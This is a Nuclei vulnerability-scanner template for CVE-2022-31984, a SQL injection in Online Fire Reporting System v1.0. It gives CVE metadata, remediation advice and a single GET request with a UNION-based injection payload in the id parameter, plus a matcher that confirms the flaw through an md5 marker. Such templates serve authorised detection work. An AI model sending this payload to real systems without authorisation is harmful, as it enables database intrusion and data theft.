nuclei-templates/http/cves/2022/CVE-2022-31984.yaml

49 lines
1.9 KiB
YAML
Raw Normal View History

2023-06-05 07:03:16 +00:00
id: CVE-2022-31984
info:
name: Online Fire Reporting System v1.0 - SQL injection
author: theamanrawat
severity: high
description: |
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/requests/take_action.php?id=.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, or manipulation of the database.
2023-09-06 11:59:08 +00:00
remediation: |
To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.
2023-06-05 07:03:16 +00:00
reference:
- https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-10.md
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-31984
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-31984
cwe-id: CWE-89
epss-score: 0.00817
epss-percentile: 0.7985
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
2023-06-05 07:03:16 +00:00
metadata:
verified: "true"
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: online_fire_reporting_system_project
product: online_fire_reporting_system
2023-12-05 09:50:33 +00:00
tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project
2023-06-05 07:03:16 +00:00
variables:
num: '999999999'
http:
- method: GET
path:
- "{{BaseURL}}/admin/requests/take_action.php?id=6'+UNION+ALL+SELECT+md5('{{num}}'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
- type: status
status:
- 200
# digest: 4a0a00473045022100cc330b98b26abb2dd15a2b220426e0274b876ed2ac07eb411c69bdd81dca1b2602200beef7c18083979fdd4342c18b41a2c2abaf89b4fa2a71e9010118d28e270de0:922c64590222798bb761d5b6d8e72950